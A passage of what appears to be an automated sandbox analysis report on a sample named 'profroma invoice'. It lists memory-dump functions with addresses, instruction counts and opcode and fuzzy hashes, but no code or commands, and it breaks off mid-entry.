                                                          • Opcode ID: fadce2db8da96b72a1831cca5265afeb9fc2ecf3f2adbce792fef97249d9e25d
                                                          • Instruction ID: 09f7721ac188b0c2895f0bf451b2ae26ec2ee41622b0d5fcef6157cf7b36b015
                                                          • Opcode Fuzzy Hash: fadce2db8da96b72a1831cca5265afeb9fc2ecf3f2adbce792fef97249d9e25d
                                                          • Instruction Fuzzy Hash: A9411372A00212CBD724DF58C884B5AFBFAFB98714F14816AD9019B75AC736D982CF91
                                                          Function 01718918 Relevance: .1, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e514aeb960d9bcc1247c6df8311646aee985129f3edc7297606348d26f56a410
                                                          • Instruction ID: a3d112b63e0ded1ef17c9e71502c8d8ce452635b191eb39bcdc2af2071a8d935
                                                          • Opcode Fuzzy Hash: e514aeb960d9bcc1247c6df8311646aee985129f3edc7297606348d26f56a410
                                                          • Instruction Fuzzy Hash: CB4138315087469FD712DF69C840A6BF7E9AF88B54F40092AFA94D7254E730DE058BA3
                                                          Function 0171A020 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction ID: 60a739f0a42213b14bbead091980dfd687dc9cfbe2af467f07a8773776fb791c
                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction Fuzzy Hash: 22415B31A01255DFDF21DE6D8484BBAFB71EB90B54F5580AAE9459B24CE733CD80CB90
                                                          Function 017209AD Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4fabcd124cc8001654996c2f1dffb84f12d15f84e65d09cbfb8beeb5c9d2253
                                                          • Instruction ID: 6209a7757f6eff8a0996b756ff712051c813ab4b75ac3190360e8c809b5bcede
                                                          • Opcode Fuzzy Hash: f4fabcd124cc8001654996c2f1dffb84f12d15f84e65d09cbfb8beeb5c9d2253
                                                          • Instruction Fuzzy Hash: 80417771600611EFD721CF18C840B26FBF4FF58314F608A6AE4898B252E770EA42CBA0
                                                          Function 01750710 Relevance: .1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                          • Instruction ID: 68a8a46b426686f3b45b236e540829c88492d97e0d48a9b13c2120537778b717
                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                          • Instruction Fuzzy Hash: F5411871A00605EFDB64CF98C980AAAFBF8FF18700B10496DE956D7651E370EA44CF90
                                                          Function 0172262C Relevance: .1, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9bb5c6dc7a7272a65e106014afa6f6ede86fc6ea270d8e76721bfb70b79bf2e4
                                                          • Instruction ID: 3a7955f94aad24237177f09aaa074ace72e931b5b545847a279126bf355a414f
                                                          • Opcode Fuzzy Hash: 9bb5c6dc7a7272a65e106014afa6f6ede86fc6ea270d8e76721bfb70b79bf2e4
                                                          • Instruction Fuzzy Hash: 8D41E072505715CFCB22EF28C904B59F7B5FF48310F2086A9C9169B6A6EB70DA42CF41
                                                          Function 0175C8F9 Relevance: .1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78fd839794c79a1645fb70239ea33d27ccce68084355f48d4be083b21ded7c3a
                                                          • Instruction ID: 5a5202fb9e33d4535b81aaadb38743fc1005edb6faa3f5a6a4e30dc12a49bd66
                                                          • Opcode Fuzzy Hash: 78fd839794c79a1645fb70239ea33d27ccce68084355f48d4be083b21ded7c3a
                                                          • Instruction Fuzzy Hash: BF3168B2A00349DFDB52CF68D440B99FBF4EF09714F2085AED519EB251D3729902CB90
                                                          Function 017A07C3 Relevance: .1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de6fba360d6f186d220d2cb39200c8c4455683ba927b67f756373ac82467568f
                                                          • Instruction ID: 5edf7d7f8bba7aed7d810734bc6438a1030896d64345f2571034dbb69abdfde3
                                                          • Opcode Fuzzy Hash: de6fba360d6f186d220d2cb39200c8c4455683ba927b67f756373ac82467568f
                                                          • Instruction Fuzzy Hash: E9417BB29083019BD760DF29C845B9BFBE8FF88614F404A2EF998C7295D7709944CB92
                                                          Function 017180A0 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 159fcb8eaaccda8b17f82fcca780e38e749160b9ebf2b08e290f3f9e82f872fc
                                                          • Instruction ID: dd1a78a9d32def2b7618f51c151f6cf163333f4d46a186f8451a0519d676b46a
                                                          • Opcode Fuzzy Hash: 159fcb8eaaccda8b17f82fcca780e38e749160b9ebf2b08e290f3f9e82f872fc
                                                          • Instruction Fuzzy Hash: 3C41EF72E05616AFCB01DF1CC880AA8F7B1BF54760F24822DD815A7288DB34ED419B91
                                                          Function 017A05A7 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2ce07a24675eabd378fe2d2477649861cdd9198ca987dac96d9da64c88e6d66
                                                          • Instruction ID: fe5c928bb62479fd26248d4c7ff6e57859b416532cee9f1969bd7f15b98d376b
                                                          • Opcode Fuzzy Hash: b2ce07a24675eabd378fe2d2477649861cdd9198ca987dac96d9da64c88e6d66
                                                          • Instruction Fuzzy Hash: BE41CF726086469FC320DF68C840A6AF7E9FFC8700F540A29F995DB680E730E914C7A6
                                                          Function 01724859 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d251029b2a957951c1ead72ceae6c133cb77eb58b3afbc3c4123246bf49712a6
                                                          • Instruction ID: f52336bd9d106fbfaebfa0eee8b88e205d4c0e1c213156404207e5eb38dcf6c4
                                                          • Opcode Fuzzy Hash: d251029b2a957951c1ead72ceae6c133cb77eb58b3afbc3c4123246bf49712a6
                                                          • Instruction Fuzzy Hash: 3C41C2317043128FD725DF28D898B2AFBE9EF80354F14486DE6968B296DB70D942CB51
                                                          Function 01718B50 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5952534c1044ca305af2c62c5d1d348630295f900880f7b1a1a520b1351fba57
                                                          • Instruction ID: 74d56359c663def14efd9a7820100fb802843adfc9ecb33718eab767573fd13a
                                                          • Opcode Fuzzy Hash: 5952534c1044ca305af2c62c5d1d348630295f900880f7b1a1a520b1351fba57
                                                          • Instruction Fuzzy Hash: DD417F71A01615CFCB15DF6DC98099DFBF1FF88320F2486AAD466A7394D734A941CB41
                                                          Function 017302E1 Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                          • Instruction ID: 0980f9cbfed231041c8fc483c8dacbf91242dd045d75ec78a12cb6d141c398c8
                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                          • Instruction Fuzzy Hash: D7311631A04245AFDB129B68CC88B9BFFE9AF54750F0441A9F855D7357C6B4D884CBA0
                                                          Function 017CE3DB Relevance: .1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a639f04fea530c3a48e4dbb6bd8917e941dba89277ca6f195f4bb4fd9dcab866
                                                          • Instruction ID: 907b186eb537f79e1157e2cbf9ce13f9f86bbe49f2ad858f2431ec20ac039238
                                                          • Opcode Fuzzy Hash: a639f04fea530c3a48e4dbb6bd8917e941dba89277ca6f195f4bb4fd9dcab866
                                                          • Instruction Fuzzy Hash: 3331A835750716ABD7229F958C45F6BFAB8AB58F50F10002CFA00AB295DEA4DD00D7A0
                                                          Function 017D4B4B Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19dc8f11930a93fe598c4351b602f564002c74acc6c3dc561b5829144a261f17
                                                          • Instruction ID: 75e105c7a28c86756e0d82164d5e253ca65d8153b26aeba9c3bca292ec05817b
                                                          • Opcode Fuzzy Hash: 19dc8f11930a93fe598c4351b602f564002c74acc6c3dc561b5829144a261f17
                                                          • Instruction Fuzzy Hash: 0631CF322052058FC721DF19D880E26F7F9FB81360F1A446EE99A8BA56E771A900CF91
                                                          Function 01724260 Relevance: .1, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91552821bde27c8343093d67563398e238bc6dea7a8c064fac38649fdebe6a46
                                                          • Instruction ID: 32da78d75cb7d830309f8bbfc99d78f016a78d3a73deffce04768626a7132da8
                                                          • Opcode Fuzzy Hash: 91552821bde27c8343093d67563398e238bc6dea7a8c064fac38649fdebe6a46
                                                          • Instruction Fuzzy Hash: BF41CE31244B45DFC722DF28C894FD6BBE9BF49350F01482DE69A8B251CBB4E804CB90
                                                          Function 017D4BB0 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3bba7a1c7abcb6f8d97b04bdc7fb19f57f32d377549c84bc6d190693a226bf0
                                                          • Instruction ID: 45aa1c007fcf1698cdfdce20e78ab1ca10b2bef2d216ff8817fc08e382296f56
                                                          • Opcode Fuzzy Hash: a3bba7a1c7abcb6f8d97b04bdc7fb19f57f32d377549c84bc6d190693a226bf0
                                                          • Instruction Fuzzy Hash: EB318D726052059FD720DF28C880A2AF7F5FB84720F19456DF99A9BA95E730ED04CB91
                                                          Function 0179EB1D Relevance: .1, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b3711b45835b1a6b70e370d9247644be3770050b570dd646b2ac0a9a9f1cd53
                                                          • Instruction ID: 56fa0e562fa211ada3ab8a4b282fe837410f2266be2907335fcece68d5942bf5
                                                          • Opcode Fuzzy Hash: 9b3711b45835b1a6b70e370d9247644be3770050b570dd646b2ac0a9a9f1cd53
                                                          • Instruction Fuzzy Hash: EC31C4322016C69BFB32D75CE94CF25FBD8BB41744F1D04A0AB859B6D2DF28D884C220
                                                          Function 017E61C3 Relevance: .1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9e0fb2b50715f5d0cfb2bee399eb63449f79dc282214fc924e2fb08100fd3c0
                                                          • Instruction ID: 60f260a3644276c6f4c06d1c36c225a35d1f62a353922b954679ee81d26be08d
                                                          • Opcode Fuzzy Hash: c9e0fb2b50715f5d0cfb2bee399eb63449f79dc282214fc924e2fb08100fd3c0
                                                          • Instruction Fuzzy Hash: 9231B275A00116ABDB15DF98C844BAEF7F9FB48B40F454168F901EB285D770ED00CBA4
                                                          Function 017C483A Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25b6b45d2815519abd112e7da07368238e7b2a66922ee8c3cc111e7ea99bbb88
                                                          • Instruction ID: b03ba8318650239ae21fd2a64e2180eabecaef95fd12c42b434cea79ff5de612
                                                          • Opcode Fuzzy Hash: 25b6b45d2815519abd112e7da07368238e7b2a66922ee8c3cc111e7ea99bbb88
                                                          • Instruction Fuzzy Hash: D0316576A4012DABCF21DF54DC98BDEBBF9AB98710F1100A9E509A7254CB30DE91CF90
                                                          Function 0174EB20 Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 84919fafeb07ed7ef11343e1b3ca1f29ba7a9f64e0c82b4841a7409436ed718d
                                                          • Instruction ID: 7d589a5fde023227e043f8fde81d6e2f5287e361d8194fcf39fe4019754ea3b0
                                                          • Opcode Fuzzy Hash: 84919fafeb07ed7ef11343e1b3ca1f29ba7a9f64e0c82b4841a7409436ed718d
                                                          • Instruction Fuzzy Hash: 8331A172E00215AFDB21DEA9CC44EAEFBB8FF48760F114465E956E7250D7749E40CBA0
                                                          Function 017E60B8 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 53f007b124ab3f0a43bb48d8fcf9e13915714de95dac1976bad4701eb08c5073
                                                          • Instruction ID: d1fbea7c1e33074ce4764c29dd274c088741617e112248a3338ca941e69b18c5
                                                          • Opcode Fuzzy Hash: 53f007b124ab3f0a43bb48d8fcf9e13915714de95dac1976bad4701eb08c5073
                                                          • Instruction Fuzzy Hash: CD31B672640616EBD7139F99C854B6AF7F9AF98754F10406DF505DB346DA30DD008B90
                                                          Function 017207AF Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 066d2c9b1aa980105a4da5e21f248c6c3b01f4620e310aa5c7fabd55f5837458
                                                          • Instruction ID: ef1c08698cf0101622e992ea0b0a818bb9aa1afe90cbca4a6029d19cd13f89a7
                                                          • Opcode Fuzzy Hash: 066d2c9b1aa980105a4da5e21f248c6c3b01f4620e310aa5c7fabd55f5837458
                                                          • Instruction Fuzzy Hash: 93310372A44222DBCB22DE288884E6BFBA5AFD4660F024568FD5597314DA70DC0287F1
                                                          Function 01728550 Relevance: .1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 46cf807e2739a3bf21a02cc9ab488ce8241d2b3360289cf7785506eff9a082d5
                                                          • Instruction ID: 6db04f034b6ee09bec84c44e3a09e5924878b125aa15742ef6b56477396fe24b
                                                          • Opcode Fuzzy Hash: 46cf807e2739a3bf21a02cc9ab488ce8241d2b3360289cf7785506eff9a082d5
                                                          • Instruction Fuzzy Hash: FF31AC726093118FE721DF1AC840B2BFBE5FB88700F14496DE9849B355D771E845CB92
                                                          Function 0175A6C7 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                          • Instruction ID: 68b3c61afce50eff328cae812746c78f1e28cbda940bf81cd5931ed9d0a361aa
                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                          • Instruction Fuzzy Hash: 4C312DB2B00B01AFD761CF69DD41B57FBF8BB08650F040A7DA99AC7651E670E900CB60
                                                          Function 017CEBD0 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 350e3a13b6e88cc13734f81935164c2c3402d1926b00df3fa0d9aad41a049b0a
                                                          • Instruction ID: 06229bfaf2653fadf8b4b2b9488bf5393f970a76b0f958299f2cbd1a617d8b6a
                                                          • Opcode Fuzzy Hash: 350e3a13b6e88cc13734f81935164c2c3402d1926b00df3fa0d9aad41a049b0a
                                                          • Instruction Fuzzy Hash: D23167725093418FC721DF19C54085AFFF5FB89B18F4449AEE4889B256E7319A44CB92
                                                          Function 0174438F Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a522b50819db911ebcbb7e653dff70e02bdedf97d359c4a95df7a242daa7f077
                                                          • Instruction ID: 6eb424de767615b3d95cb3d15562dd7a7ffeb9b9bcf1b03c45d465d7ae9dc1fb
                                                          • Opcode Fuzzy Hash: a522b50819db911ebcbb7e653dff70e02bdedf97d359c4a95df7a242daa7f077
                                                          • Instruction Fuzzy Hash: 9A31F172B002069FD720EFA8C884B6EFBF9BB84304F108429D546D7255E730E941DB90
                                                          Function 0171CB7E Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                          • Instruction ID: 9fc713000d237ad77582019f138b92eef349f12091451abd9a72d0657275c6d6
                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                          • Instruction Fuzzy Hash: 3D21E636E4125AAAEB11DFB98841BAFFBB5AF55740F0980759E55E7340E270DD0087A0
                                                          Function 0171C156 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 574d7e02ee3704313011193098a7d8f938f75c4a68806287b6872d9f41e3fd5d
                                                          • Instruction ID: 3d07a7eab4fb8e123adf6724bda92c1164e4451c3995337f6c5827e992262876
                                                          • Opcode Fuzzy Hash: 574d7e02ee3704313011193098a7d8f938f75c4a68806287b6872d9f41e3fd5d
                                                          • Instruction Fuzzy Hash: 3E3170B25002018BDB31AF58CC45BB9F7B4EF90314F5485A9DD859B387EA74D982CB90
                                                          Function 017DC3CD Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                          • Instruction ID: 7c242695e9fe795aa9cd5da2a20fc86b188c0be7a1d9bb69ff73c83bb5860df5
                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                          • Instruction Fuzzy Hash: B6213D3660075AB6CF26ABD5CC04ABBFFB5EF40710F40841EFAA58B695E634D940C760
                                                          Function 0171E420 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c3735c42fde5a05b95d41afad926caf633bba06f8767041e38d3f59d19b61ffb
                                                          • Instruction ID: 1f0077a8dab79c4c86c506cc9d72a402cc886aa94e91ec60f7844f503c45216b
                                                          • Opcode Fuzzy Hash: c3735c42fde5a05b95d41afad926caf633bba06f8767041e38d3f59d19b61ffb
                                                          • Instruction Fuzzy Hash: 8831B432A4152C9BDB36DB1CCC41FEEF7B9AB15750F0101A1FE55A7294DA749E808FA0
                                                          Function 01754588 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                          • Instruction ID: 707f7c85980da5443550a48a33f3377e7631c89d0e59e8bbc237790cf3f0cfa3
                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                          • Instruction Fuzzy Hash: AB219135A00609EFCB51CF58C984A8EFBF5FF48314F508065EE169F241E6B1EE458BA0
                                                          Function 017544B0 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9cb7753509b6af0d93178ca54b60dac28f1e22c34c5c55ab6cc9ac20d769016c
